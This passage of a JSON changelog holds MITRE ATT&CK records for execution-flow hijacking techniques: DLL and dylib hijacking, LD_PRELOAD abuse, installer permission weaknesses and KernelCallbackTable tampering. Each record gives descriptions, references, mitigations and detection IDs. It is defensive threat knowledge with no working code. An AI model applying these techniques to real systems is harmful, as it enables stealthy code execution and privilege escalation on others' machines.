+                            "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview"
+                        },
+                        {
+                            "source_name": "subTee .NET Profilers May 2017",
+                            "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.",
+                            "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html"
+                        },
+                        {
+                            "source_name": "GitHub OmerYa Invisi-Shell",
+                            "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.",
+                            "url": "https://github.com/OmerYa/Invisi-Shell"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jesse Brown, Red Canary"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.727000+00:00\", \"old_value\": \"2026-04-16 18:58:17.752000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1024: Restrict Registry Permissions",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0479: Detection Strategy for Hijack Execution Flow using the Windows COR_PROFILER."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 18:11:08.357000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "DLL",
+                    "description": "Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)\n\nSpecific ways DLLs are abused by adversaries include:\n\n### DLL Sideloading\nAdversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).\n\nSide-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.\n\nAdversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)\n\nAdversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware\u2019s behavior.  Another method implements a \u201cloader-for-a-loader\u201d, where a malicious DLL\u2019s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos)\n\n### DLL Search Order Hijacking\nAdversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)\n\n### DLL Redirection\nAdversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)\n\n### Phantom DLL Hijacking\nAdversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)\n\n### DLL Substitution\nAdversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)\n\nPrograms that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.\n\nRemote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)\n\nIf a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/001",
+                            "external_id": "T1574.001"
+                        },
+                        {
+                            "source_name": "Hijack DLLs CrowdStrike",
+                            "description": " falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries Hijack DLLs \u2014 and How CrowdStrike Falcon OverWatch Fights Back. Retrieved January 30, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/"
+                        },
+                        {
+                            "source_name": "kroll bpl",
+                            "description": "Dave Truman. (2024, June 24). Novel Technique Combination Used In IDATLOADER Distribution. Retrieved January 30, 2025.",
+                            "url": "https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution"
+                        },
+                        {
+                            "source_name": "Sophos",
+                            "description": "Gabor Szappanos. (2023, May 3). A doubled \u201cDragon Breath\u201d adds new air to DLL sideloading attacks. Retrieved October 3, 2025.",
+                            "url": "https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/"
+                        },
+                        {
+                            "source_name": "Hexacorn DLL Hijacking",
+                            "description": "Hexacorn. (2013, December 8). Beyond good ol\u2019 Run key, Part 5. Retrieved August 14, 2024.",
+                            "url": "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/"
+                        },
+                        {
+                            "source_name": "microsoft remote preloading",
+                            "description": "Microsoft. (2014, May 13). Microsoft Security Advisory 2269637: Insecure Library Loading Could Allow Remote Code Execution. Retrieved January 30, 2025.",
+                            "url": "https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637"
+                        },
+                        {
+                            "source_name": "Microsoft - manifests/assembly",
+                            "description": "Microsoft. (2021, January 7). Manifests. Retrieved January 30, 2025.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN"
+                        },
+                        {
+                            "source_name": "Microsoft redirection",
+                            "description": "Microsoft. (2023, October 12). Dynamic-link library redirection. Retrieved January 30, 2025.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN"
+                        },
+                        {
+                            "source_name": "dll pre load owasp",
+                            "description": "OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025.",
+                            "url": "https://owasp.org/www-community/attacks/Binary_planting"
+                        },
+                        {
+                            "source_name": "Virus Bulletin",
+                            "description": "Suguru Ishimaru, Hajime Yanagishita, Yusuke Niwa. (2023, October 5). Unveiling activities of Tropic Trooper 2023: deep analysis of Xiangoop Loader and EntryShell payload. Retrieved October 3, 2025.",
+                            "url": "https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/"
+                        },
+                        {
+                            "source_name": "unit 42",
+                            "description": "Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22). Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/dll-hijacking-techniques/"
+                        },
+                        {
+                            "source_name": "Wietze Beukema DLL Hijacking",
+                            "description": "Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved April 8, 2025.",
+                            "url": "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ami Holeston, CrowdStrike",
+                        "Hajime Yanagishita, Macnica, Inc.",
+                        "Marina Liang",
+                        "Stefan Kanthak",
+                        "Suguru Ishimaru, ITOCHU Cyber & Intelligence Inc.",
+                        "Travis Smith, Tripwire",
+                        "Wietze Beukema @Wietze",
+                        "Will Alexander, CrowdStrike",
+                        "Yusuke Niwa, ITOCHU Cyber & Intelligence Inc."
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2026-04-15 22:57:22.515000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1038: Execution Prevention",
+                            "M1044: Restrict Library Loading",
+                            "M1047: Audit",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0201: Detection Strategy for Hijack Execution Flow for DLLs"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-16 15:23:30.896000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Dylib Hijacking",
+                    "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/004",
+                            "external_id": "T1574.004"
+                        },
+                        {
+                            "source_name": "MalwareUnicorn macOS Dylib Injection MachO",
+                            "description": "Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.",
+                            "url": "https://malwareunicorn.org/workshops/macos_dylib_injection.html#5"
+                        },
+                        {
+                            "source_name": "Wardle Dylib Hijacking OSX 2015",
+                            "description": "Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.",
+                            "url": "https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf"
+                        },
+                        {
+                            "source_name": "Writing Bad Malware for OSX",
+                            "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.",
+                            "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf"
+                        },
+                        {
+                            "source_name": "Wardle Dylib Hijack Vulnerable Apps",
+                            "description": "Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.",
+                            "url": "https://objective-see.com/blog/blog_0x46.html"
+                        },
+                        {
+                            "source_name": "wardle artofmalware volume1",
+                            "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved November 17, 2024.",
+                            "url": "https://taomm.org/vol1/read.html"
+                        },
+                        {
+                            "source_name": "Github EmpireProject HijackScanner",
+                            "description": "Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.",
+                            "url": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py"
+                        },
+                        {
+                            "source_name": "Github EmpireProject CreateHijacker Dylib",
+                            "description": "Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.",
+                            "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-15 22:58:27.104000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0152: Detection Strategy for Hijack Execution Flow: Dylib Hijacking"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:09:59.569000+00:00",
+                    "modified": "2026-05-12 15:12:00.636000+00:00",
+                    "name": "Dynamic Linker Hijacking",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.(Citation: Baeldung LD_PRELOAD)\n\nHijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library\u2019s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to [Hide Artifacts](https://attack.mitre.org/techniques/T1564) from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Intezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit 2024)\n\nHijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/006",
+                            "external_id": "T1574.006"
+                        },
+                        {
+                            "source_name": "Apple Doco Archive Dynamic Libraries",
+                            "description": "Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.",
+                            "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html"
+                        },
+                        {
+                            "source_name": "Baeldung LD_PRELOAD",
+                            "description": "baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.",
+                            "url": "https://www.baeldung.com/linux/ld_preload-trick-what-is"
+                        },
+                        {
+                            "source_name": "TheEvilBit DYLD_INSERT_LIBRARIES",
+                            "description": "Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.",
+                            "url": "https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/"
+                        },
+                        {
+                            "source_name": "Intezer Symbiote 2022",
+                            "description": "Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.",
+                            "url": "https://intezer.com/blog/research/new-linux-threat-symbiote/"
+                        },
+                        {
+                            "source_name": "Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass",
+                            "description": "Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.",
+                            "url": "https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191"
+                        },
+                        {
+                            "source_name": "Man LD.SO",
+                            "description": "Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.",
+                            "url": "https://www.man7.org/linux/man-pages/man8/ld.so.8.html"
+                        },
+                        {
+                            "source_name": "Elastic Security Labs Pumakit 2024",
+                            "description": "Remco Sprooten and Ruben Groenewoud. (2024, December 11). Declawing PUMAKIT. Retrieved March 24, 2025.",
+                            "url": "https://www.elastic.co/security-labs/declawing-pumakit"
+                        },
+                        {
+                            "source_name": "TLDP Shared Libraries",
+                            "description": "The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.",
+                            "url": "https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html"
+                        },
+                        {
+                            "source_name": "Timac DYLD_INSERT_LIBRARIES",
+                            "description": "Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.",
+                            "url": "https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/"
+                        },
+                        {
+                            "source_name": "ESET Ebury Oct 2017",
+                            "description": "Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.",
+                            "url": "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.636000+00:00\", \"old_value\": \"2026-04-15 22:57:21.530000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0435: Detection Strategy for Hijack Execution Flow: Dynamic Linker Hijacking"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 11:12:18.558000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Executable Installer File Permissions Weakness",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/005",
+                            "external_id": "T1574.005"
+                        },
+                        {
+                            "source_name": "mozilla_sec_adv_2012",
+                            "description": "Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.",
+                            "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/"
+                        },
+                        {
+                            "source_name": "Executable Installers are Vulnerable",
+                            "description": "Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.",
+                            "url": "https://seclists.org/fulldisclosure/2015/Dec/34"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Stefan Kanthak",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2026-04-15 23:02:03.423000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit",
+                            "M1052: User Account Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0038: Detection Strategy for Hijack Execution Flow using Executable Installer File Permissions Weakness"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-02-25 15:27:44.927000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "KernelCallbackTable",
+                    "description": "Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)\n\nAn adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.\n\nA pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)\n\nThe tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/013",
+                            "external_id": "T1574.013"
+                        },
+                        {
+                            "source_name": "FinFisher exposed ",
+                            "description": "Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher\u2019s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/"
+                        },
+                        {
+                            "source_name": "NtQueryInformationProcess",
+                            "description": "Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess"
+                        },
+                        {
+                            "source_name": "Windows Process Injection KernelCallbackTable",
+                            "description": "odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.",
+                            "url": "https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/"
+                        },
+                        {
+                            "source_name": "Lazarus APT January 2022",
+                            "description": "Saini, A. and Hossein, J. (2022, January 27). North Korea\u2019s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.",
